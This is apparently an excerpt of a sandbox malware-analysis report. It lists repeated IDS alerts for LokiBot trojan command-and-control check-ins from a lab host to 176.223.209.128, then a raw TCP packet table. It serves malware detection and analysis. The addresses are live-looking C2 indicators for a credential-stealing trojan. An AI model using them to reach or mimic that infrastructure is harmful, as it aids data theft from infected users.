                                              11/25/21-10:55:11.026773TCP2025381ET TROJAN LokiBot Checkin5068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.026773TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068480192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2025381ET TROJAN LokiBot Checkin5068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:11.540230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068580192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2025381ET TROJAN LokiBot Checkin5068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.060170TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068680192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2025381ET TROJAN LokiBot Checkin5068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:12.564542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068780192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2025381ET TROJAN LokiBot Checkin5068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.073926TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068880192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2025381ET TROJAN LokiBot Checkin5068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:13.588604TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25068980192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2025381ET TROJAN LokiBot Checkin5069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.101732TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069080192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2025381ET TROJAN LokiBot Checkin5069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:14.619405TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069180192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2025381ET TROJAN LokiBot Checkin5069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.119361TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069280192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2025381ET TROJAN LokiBot Checkin5069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:15.607178TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069380192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2025381ET TROJAN LokiBot Checkin5069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.105694TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069480192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2025381ET TROJAN LokiBot Checkin5069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:16.623551TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069580192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2025381ET TROJAN LokiBot Checkin5069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.136322TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069680192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2025381ET TROJAN LokiBot Checkin5069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:17.661094TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069780192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2025381ET TROJAN LokiBot Checkin5069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.167114TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069880192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2025381ET TROJAN LokiBot Checkin5069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:18.649872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25069980192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2025381ET TROJAN LokiBot Checkin5070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.101720TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070080192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2025381ET TROJAN LokiBot Checkin5070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:19.627458TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070180192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2025381ET TROJAN LokiBot Checkin5070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.138106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070280192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2025381ET TROJAN LokiBot Checkin5070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:20.632791TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070380192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2025381ET TROJAN LokiBot Checkin5070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.146267TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070480192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2025381ET TROJAN LokiBot Checkin5070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:21.663106TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070580192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2025381ET TROJAN LokiBot Checkin5070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.180632TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070680192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2025381ET TROJAN LokiBot Checkin5070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:22.690105TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070780192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2025381ET TROJAN LokiBot Checkin5070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.208795TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070880192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2025381ET TROJAN LokiBot Checkin5070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:23.713368TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25070980192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2025381ET TROJAN LokiBot Checkin5071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.216252TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071080192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2025381ET TROJAN LokiBot Checkin5071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:24.719606TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071180192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2025381ET TROJAN LokiBot Checkin5071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.235141TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071280192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2025381ET TROJAN LokiBot Checkin5071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:25.759054TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071380192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2025381ET TROJAN LokiBot Checkin5071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.277776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071480192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2025381ET TROJAN LokiBot Checkin5071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:26.773687TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071580192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2025381ET TROJAN LokiBot Checkin5071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.262392TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071680192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2025381ET TROJAN LokiBot Checkin5071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:27.777041TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071780192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2025381ET TROJAN LokiBot Checkin5071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.274622TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071880192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2025381ET TROJAN LokiBot Checkin5071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:28.757055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25071980192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2025381ET TROJAN LokiBot Checkin5072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.273209TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072080192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2025381ET TROJAN LokiBot Checkin5072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:29.703563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072180192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2025381ET TROJAN LokiBot Checkin5072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.142951TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072280192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2025381ET TROJAN LokiBot Checkin5072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:30.577953TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072380192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2025381ET TROJAN LokiBot Checkin5072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.094477TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072480192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2025381ET TROJAN LokiBot Checkin5072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:31.594377TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072580192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2025381ET TROJAN LokiBot Checkin5072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.108072TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072680192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15072780192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5072780192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2025381ET TROJAN LokiBot Checkin5072780192.168.11.20176.223.209.128
                                              11/25/21-10:55:32.638413TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25072780192.168.11.20176.223.209.128

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2021 10:47:51.315337896 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.315355062 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.315623045 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.327244043 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.327254057 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.757873058 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.758124113 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.904304028 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.904364109 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.905023098 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:51.905283928 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.908416033 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:51.951900959 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230103970 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230159998 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230254889 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.230294943 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.230305910 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.230458021 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.230494976 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.438500881 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.438532114 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.438781977 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439002991 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.439160109 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439258099 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.439333916 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439368010 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.439486027 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439529896 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.439558983 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.645909071 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.645930052 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.646119118 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.646176100 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.647803068 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648298025 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648332119 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.648364067 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648547888 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.648597956 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.648950100 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.688452005 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.688659906 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.688813925 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.854479074 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.854779005 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.857505083 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.857702971 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.857880116 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858072042 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858251095 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858294964 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858325005 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858409882 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858500004 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858530998 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858720064 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.858789921 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.858895063 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.859002113 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.859046936 CET44349816197.242.150.64192.168.11.20
                                              Nov 25, 2021 10:47:52.859054089 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:52.859409094 CET49816443192.168.11.20197.242.150.64
                                              Nov 25, 2021 10:47:54.169415951 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.202750921 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.203001022 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.204528093 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.237848043 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.238023996 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.271303892 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.380963087 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.381019115 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:47:54.381377935 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.381423950 CET4981780192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:47:54.414658070 CET8049817176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:00.959841013 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.993249893 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:00.993474007 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.994992018 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.995047092 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:00.995079994 CET4982180192.168.11.20176.223.209.128
                                              Nov 25, 2021 10:48:01.028297901 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.028568983 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.028614998 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.080023050 CET8049821176.223.209.128192.168.11.20
                                              Nov 25, 2021 10:48:01.080080032 CET8049821176.223.209.128192.168.11.20
